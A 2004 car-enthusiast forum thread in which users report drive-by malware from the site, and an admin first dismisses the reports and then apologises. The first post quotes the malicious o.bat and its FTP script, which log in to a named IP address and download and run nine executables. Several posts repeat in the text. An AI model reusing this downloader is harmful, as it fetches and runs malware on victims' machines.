I think I got a Trojan from the CZ28 server.
09-24-2004, 04:19 PM
#1
Registered User
Thread Starter
Join Date: Jun 2001
Location: Endicott, NY / FT. Worth, TX
Posts: 245
I think I got a Trojan from the CZ28 server.
I visited the site today from my work computer during lunch (like I always do). A .bat file appeared on my desktop and then ran by itself. It shelled to and from DOS very quickly and then stayed in the DOS shell for a minute or so and displayed something like.
Then after a 45seconds or so, it went back to windows and everything was fine.
Every time I load www.cz28.com it runs the .bat file again.
Here are the contents of the bat file named “o.bat”:
and an accompanying text file named simply “o”:
I’ll do the typical spybot stuff on Monday.
Just thought I should say something.
BTW: This dinosaur is running windows 95 and IE 5. (don’t laugh, we have some old software the requires 9X and I got stuck with it)
C:\windows\desctop\if not exist WINDOWSstatuslog ftp -s:o
ftp>open 207.58.159.14
ftp>open 207.58.159.14
Then after a 45seconds or so, it went back to windows and everything was fine.
Every time I load www.cz28.com it runs the .bat file again.
Here are the contents of the bat file named “o.bat”:
if not exist C:\WINDOWSstatuslog ftp -s:o
if exist julie.exe julie.exe
if exist dp807615.exe dp807615.exe
if exist newdevin.exe newdevin.exe
if exist istinstall_154074.exe istinstall_154074.exe
if exist TVM_B5.EXE TVM_B5.EXE
if exist 06wu29rd.exe 06wu29rd.exe
if exist CS4P028.exe CS4P028.exe
if exist PlayBingoOnline.exe PlayBingoOnline.exe
if exist 449166.exe 449166.exe
if exist julie.exe julie.exe
if exist dp807615.exe dp807615.exe
if exist newdevin.exe newdevin.exe
if exist istinstall_154074.exe istinstall_154074.exe
if exist TVM_B5.EXE TVM_B5.EXE
if exist 06wu29rd.exe 06wu29rd.exe
if exist CS4P028.exe CS4P028.exe
if exist PlayBingoOnline.exe PlayBingoOnline.exe
if exist 449166.exe 449166.exe
open 207.58.159.14
tmpacct
12345
bin
get julie.exe
get dp807615.exe
get newdevin.exe
get istinstall_154074.exe
get TVM_B5.EXE
get 06wu29rd.exe
get CS4P028.exe
get PlayBingoOnline.exe
get 449166.exe
bye
tmpacct
12345
bin
get julie.exe
get dp807615.exe
get newdevin.exe
get istinstall_154074.exe
get TVM_B5.EXE
get 06wu29rd.exe
get CS4P028.exe
get PlayBingoOnline.exe
get 449166.exe
bye
Just thought I should say something.
BTW: This dinosaur is running windows 95 and IE 5. (don’t laugh, we have some old software the requires 9X and I got stuck with it)
Last edited by eyeoutthere; 09-24-2004 at 04:21 PM.
09-24-2004, 04:28 PM
#2
Registered User
Join Date: Jul 2003
Location: oklahoma
Posts: 43
Re: I think I got a Trojan from the CZ28 server.
I got tons of SH*T on my pc as well from this site!!! Just visited on thursday and when to the shell free gas thing then all of a sudden pc slows WAY down and i get tons of BS stuff!!! I am running spyware stuff but its just not working very well! Kill the shell free gas link or check it out before more people get this stuff. Thanks! 
09-24-2004, 04:37 PM
#3
Admin Emeritus
Join Date: Dec 1997
Location: Nashville, TN area
Posts: 11,157
Re: I think I got a Trojan from the CZ28 server.
Edited...now eating crow.
For reference...
http://web.camaross.com/forums/faq.p...faq_no_spyware
But also see next post...
For reference...
http://web.camaross.com/forums/faq.p...faq_no_spyware
But also see next post...
09-26-2004, 01:12 PM
#4
Admin Emeritus
Join Date: Dec 1997
Location: Nashville, TN area
Posts: 11,157
Re: I think I got a Trojan from the CZ28 server.
Looks like I owe you guys an apology.
I was mistaken...I thought you guys were saying the Shell Gas THREAD was giving off spyware, but now it looks as if this is not an isolated incident.
See...the thing is...with as many people here, someone always has a problem with their computer and since they use this site the most they are quick to jump all over us and accuse us of doing something vile. The alert that is made to us is almost ALWAYS done is a very angry and accusing manner, and 99.9% of the time, the problem never had anything to do with us or this site.
In addition, someone makes the false accusation in this forum, and someone else reads it and says, "Hey...I have some crappy spyware on my computer too. Looks like it is CamaroZ28.Com's fault." Next thing you know, people are posting on other sites that Chris and Jason are bad guys and the site gets a bad rep for nothing. This is why we try to ask if anyone has this kind of problem, to e-mail us first so we can look into it instead of feeling like we are put on the spot. It is far too common, and it is almost always a non-constructive warning that is given to us instead of a helpful one.
In this case...something clearly went wrong and we honestly don't do things like this on purpose since it is out of our hands and we have no prior warning of it.
I think I took care of it...but I am not going to stop there. I want to do my best to ensure that something like this doesn't happen again. We don't like it any more than you do.
So please accept my apologies for my hasty reply, and please also accept our thanks for the help.
If any problems like this continue, please do not hesitiate to e-mail us and let us know with as much information as possible.
Thanks again.
(Crow tastes crappy no matter how much sugar is put on it...)
I was mistaken...I thought you guys were saying the Shell Gas THREAD was giving off spyware, but now it looks as if this is not an isolated incident.
See...the thing is...with as many people here, someone always has a problem with their computer and since they use this site the most they are quick to jump all over us and accuse us of doing something vile. The alert that is made to us is almost ALWAYS done is a very angry and accusing manner, and 99.9% of the time, the problem never had anything to do with us or this site.
In addition, someone makes the false accusation in this forum, and someone else reads it and says, "Hey...I have some crappy spyware on my computer too. Looks like it is CamaroZ28.Com's fault." Next thing you know, people are posting on other sites that Chris and Jason are bad guys and the site gets a bad rep for nothing. This is why we try to ask if anyone has this kind of problem, to e-mail us first so we can look into it instead of feeling like we are put on the spot. It is far too common, and it is almost always a non-constructive warning that is given to us instead of a helpful one.
In this case...something clearly went wrong and we honestly don't do things like this on purpose since it is out of our hands and we have no prior warning of it.
I think I took care of it...but I am not going to stop there. I want to do my best to ensure that something like this doesn't happen again. We don't like it any more than you do.
So please accept my apologies for my hasty reply, and please also accept our thanks for the help.
If any problems like this continue, please do not hesitiate to e-mail us and let us know with as much information as possible.
Thanks again.
(Crow tastes crappy no matter how much sugar is put on it...)
